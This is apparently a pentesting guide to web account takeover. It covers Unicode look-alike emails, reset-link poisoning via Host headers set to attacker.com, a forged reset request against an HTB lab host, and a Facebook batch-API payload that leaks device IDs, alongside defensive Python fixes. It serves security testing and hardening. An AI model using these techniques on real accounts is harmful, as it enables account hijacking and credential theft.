Account Takeover

Authorization Issue

Try to change the email of the account and examine the confirmation process. If it turns out to be weak, the email should be changed to the target victim's and then confirmed.

Unicode Normalization Issue

  1. Victim account: victim@gmail.com
  2. An account should be created using Unicode,
    for example: vićtim@gmail.com

As explained in this talk, the above attack can also be carried out through third-party identity providers:

  • Create an account at a third-party identity provider with an email that looks like the victim's but uses a Unicode character (vićtim@company.com).
  • The third-party provider must not verify the email.
  • If the identity provider does verify the email, you may be able to attack the domain part instead, e.g. victim@ćompany.com: register that domain and rely on the identity provider producing the ASCII version of the domain while the victim's platform normalizes the domain name.
  • Log in with that identity provider on the victim's platform, which should normalize the Unicode character and grant you access to the victim's account.
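The defensive counterpart to the two bullets above, as an added example that is not part of the original page or the talk it cites: a registration gate that folds look-alike addresses onto a comparison key and refuses collisions, and an IdP login resolver that links accounts only on an exact ASCII match and refuses matches that exist only after Unicode folding. The account lists are constructed sample data; `collision_key`, `check_registration` and `resolve_idp_email` are names chosen here.

```python
import unicodedata

def collision_key(email):
    """Comparison key that folds Unicode look-alikes onto plain ASCII.

    NFKC folds compatibility forms (full-width letters, ligatures), NFD then
    splits accented letters into base + combining mark so the mark can be
    dropped ('ć' -> 'c'), and casefold() removes case. The key is used only
    to detect collisions; the stored address stays exactly as entered.
    """
    folded = unicodedata.normalize("NFD", unicodedata.normalize("NFKC", email))
    stripped = "".join(ch for ch in folded if not unicodedata.combining(ch))
    return stripped.casefold()

def check_registration(existing_emails, new_email, allow_unicode=False):
    """Registration gate. Returns (allowed, reason).

    existing_emails: verified addresses already on the platform
    (constructed sample data in the tests).
    """
    if not allow_unicode and not new_email.isascii():
        return False, "non-ascii address"
    new_key = collision_key(new_email)
    for existing in existing_emails:
        if collision_key(existing) == new_key:
            return False, "collides with existing account"
    return True, "ok"

def resolve_idp_email(accounts, asserted_email):
    """Map an email asserted by a third-party identity provider to a local
    account. Only an exact ASCII, case-insensitive match is accepted. A match
    that exists only after folding (e.g. 'vićtim@' vs 'victim@') is refused
    instead of silently linked, which is the behaviour the section above abuses.
    """
    for account in accounts:
        if account.isascii() and asserted_email.isascii() \
                and account.lower() == asserted_email.lower():
            return account
    for account in accounts:
        if collision_key(account) == collision_key(asserted_email):
            raise PermissionError("look-alike address refused: " + asserted_email)
    return None
```

A refused look-alike login is also a useful alert: legitimate users essentially never present an address that matches an existing account only after diacritic stripping.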

For further details, refer to the document on Unicode Normalization:

Unicode Normalization

Reusing Reset Token

If the target system allows a reset link to be reused, effort should go into finding more reset links using tools such as gau, wayback, or scan.io.

Pre Account Takeover

  1. The victim's email should be used to register on the platform and a password should be set (an attempt to confirm should be made, although lacking access to the victim's mailbox may make this impossible).
  2. Wait until the victim registers using OAuth and confirms the account.
  3. It is expected that the regular registration will then be confirmed, allowing access to the victim's account.

CORS Misconfiguration to Account Takeover

If the page has CORS misconfigurations you may be able to steal sensitive information from the user to take over their account, or make them change authentication details for that purpose:

CORS - Misconfigurations & Bypass

CSRF to Account Takeover

If the page is vulnerable to CSRF you may be able to make the user change their password, email or authentication methods so that you can then log in:

CSRF (Cross Site Request Forgery)

XSS to Account Takeover

If you find an XSS in the application you may be able to steal cookies, local storage, or information from the web page that could let you take over the account:

XSS (Cross Site Scripting)

  • Attribute-only reflected payloads on login pages can hook document.onkeypress, exfiltrate keystrokes via new Image().src, and steal credentials without submitting the form. See Attribute-only login XSS behind WAFs for a practical workflow.

Same Origin + Cookies

If you find a limited XSS or a subdomain takeover, you can play with the cookies (for example by fixating them) to try to compromise the victim's account:

Cookies Hacking

Attacking Password Reset Mechanism

Reset/Forgotten Password Bypass

Security-question resets that trust client-supplied usernames

If the “update security questions” flow takes a username parameter even though the caller is already authenticated, you can overwrite any account's recovery data (including the admin's), because the backend typically executes UPDATE ... WHERE user_name = ? with your unvalidated value. An example:

  1. Log in as a throwaway user and grab the session cookie.
  2. Send the victim's username together with new answers through the reset form.
  3. Immediately authenticate via the security-question login endpoint using the answers you just set to obtain the victim's privileges.

POST /reset.php HTTP/1.1
Host: file.era.htb
Cookie: PHPSESSID=<low-priv>
Content-Type: application/x-www-form-urlencoded

username=admin_ef01cab31aa&new_answer1=A&new_answer2=B&new_answer3=C

Anything gated by the victim’s $_SESSION context (admin dashboards, dangerous stream-wrapper features, etc.) is now exposed without touching the real answers.
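To make the root cause concrete, here is an added Python model (not the PHP application's code) of the flawed handler next to its hardened form. The users table and session store are constructed in-memory dictionaries; the admin username is the one from the request above, the answers are made up.

```python
import copy

# Constructed stand-ins for the app's users table and session store.
_INITIAL_USERS = {
    "lowpriv": {"role": "user", "answers": ("x", "y", "z")},
    "admin_ef01cab31aa": {"role": "admin", "answers": ("dog", "paris", "red")},
}
USERS = copy.deepcopy(_INITIAL_USERS)
SESSIONS = {"sess-lowpriv": "lowpriv"}  # PHPSESSID-style cookie -> username

def _answers_from(form):
    return (form["new_answer1"], form["new_answer2"], form["new_answer3"])

def reset_vulnerable(session_id, form):
    """Model of the flawed handler: the row to update is chosen by the
    client-supplied `username`, i.e. UPDATE ... WHERE user_name = <form>."""
    if session_id not in SESSIONS:
        return 401
    target = form.get("username")
    if target not in USERS:
        return 404
    USERS[target]["answers"] = _answers_from(form)
    return 200

def reset_fixed(session_id, form):
    """Hardened handler: the account comes from the server-side session only.
    A `username` naming anyone else is treated as tampering and refused;
    the 403 is also a cheap detection signal worth alerting on."""
    user = SESSIONS.get(session_id)
    if user is None:
        return 401
    if form.get("username") not in (None, user):
        return 403
    USERS[user]["answers"] = _answers_from(form)
    return 200

def answers_for(username):
    return USERS[username]["answers"]

def reset_state():
    """Restore the constructed data so each scenario starts clean."""
    USERS.clear()
    USERS.update(copy.deepcopy(_INITIAL_USERS))
```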

Enumerated usernames can then be targeted via the overwrite technique above or reused against ancillary services (FTP/SSH password spraying).

Response Manipulation

If the authentication response can be reduced to a simple boolean, just try to change false to true and see whether you get any access.

OAuth to Account takeover

OAuth to Account takeover

Host Header Injection

  1. The Host header is modified following a password reset request initiation.
  2. The X-Forwarded-For proxy header is altered to attacker.com.
  3. The Host, Referer, and Origin headers are simultaneously changed to attacker.com.
  4. After initiating a password reset and then opting to resend the mail, all three of the aforementioned methods are employed.
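The server-side properties that defeat both the Reusing Reset Token section above and the Host header tricks just listed, as an added Python example that is not from the original page: tokens are single-use and expiring, only their digest is stored, a resend revokes the previous token instead of duplicating it, and the emailed link is built from a configured origin rather than any request header. `CANONICAL_ORIGIN` and the `ResetTokens` class are assumptions of this example.

```python
import hashlib
import secrets
import time

# Assumed deployment configuration: the public origin of the app. Reset links
# are always built from this value, never from Host / X-Forwarded-* headers.
CANONICAL_ORIGIN = "https://app.example.com"

class ResetTokens:
    """Single-use, expiring password-reset tokens. Only a SHA-256 digest of
    each token is kept, so a leaked database copy cannot be replayed."""

    def __init__(self, ttl_seconds=900, now=time.time):
        self.ttl = ttl_seconds
        self.now = now  # injectable clock so expiry can be tested
        self._store = {}  # sha256(token) -> (username, expires_at)

    @staticmethod
    def _digest(token):
        return hashlib.sha256(token.encode()).hexdigest()

    def issue(self, username, request_host=None):
        """Create a fresh token and the link to email. `request_host` is the
        value an attacker could inject; it is accepted only to show that it
        is deliberately ignored. Issuing again (e.g. "resend mail") revokes
        the previous token for that user instead of duplicating it."""
        self._store = {d: v for d, v in self._store.items() if v[0] != username}
        token = secrets.token_urlsafe(32)
        self._store[self._digest(token)] = (username, self.now() + self.ttl)
        return token, f"{CANONICAL_ORIGIN}/reset?token={token}"

    def redeem(self, token):
        """Return the username for a valid token, or None. The token is
        removed on first use whether or not it was still within its TTL,
        so a second visit to the same link always fails."""
        entry = self._store.pop(self._digest(token), None)
        if entry is None:
            return None
        username, expires_at = entry
        if self.now() > expires_at:
            return None
        return username
```

With this design a reset link harvested later from gau or wayback is worthless, and a poisoned Host header cannot steer the link to attacker.com.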

Response Manipulation

  1. Code Manipulation: The status code is altered to 200 OK.
  2. Code and Body Manipulation:
  • The status code is changed to 200 OK.
  • The response body is modified to {"success":true} or an empty object {}.

These manipulation techniques are effective in scenarios where JSON is utilized for data transmission and receipt.

Change email of current session

From this report:

  • The attacker requests to change their email to a new one
  • The attacker receives a link to confirm the email change
  • The attacker sends the link to the victim to click
  • The victim's email is changed to the one chosen by the attacker
  • The attacker can reset the password and take over the account

This also happened in this report.

Bypass email verification for Account Takeover

  • The attacker signs up with attacker@test.com and confirms the email during signup.
  • The attacker changes the confirmed email to victim@test.com (no second confirmation when changing the email).
  • Now the site lets victim@test.com log in and the victim user's email verification has been bypassed.

Old Cookies

As explained in this post, it was possible to log in to an account, save the cookies as an authenticated user, log out, and then log in again.
On the new login, although different cookies could be generated, the old ones started working again.

Trusted device cookies + batch API leakage

Long-lived device identifiers that gate recovery can be stolen when a batch API lets you copy unreadable subresponses into writable sinks.

  • Identify a trusted-device cookie (SameSite=None, long-lived) that is used to relax recovery checks.
  • Find a first-party endpoint that returns that device ID in JSON (e.g., an OAuth code exchange returning machine_id) but is not readable cross-origin.
  • Use a batch/chained API that allows referencing earlier subresponses ({result=name:$.path}) and writing them into an attacker-visible sink (page post, upload-by-URL, etc.). Example with Facebook Graph API:
POST https://graph.facebook.com/
batch=[
{"method":"post","omit_response_on_success":0,"relative_url":"/oauth/access_token?client_id=APP_ID%26redirect_uri=REDIRECT_URI","body":"code=SINGLE_USE_CODE","name":"leaker"},
{"method":"post","relative_url":"PAGE_ID/posts","body":"message={result=leaker:$.machine_id}"}
]
access_token=PAGE_ACCESS_TOKEN&method=post
  • Load the batch URL in a hidden <iframe> so the victim sends the trusted-device cookie; the JSON-path reference copies machine_id into an attacker-controlled post even though the OAuth response is not readable on the page.
  • Replay: set the stolen device cookie in a new session. Recovery now treats the browser as trusted, often exposing a weaker “no email/phone” flow (e.g., automatic document upload) that adds the attacker's email without a password or 2FA.
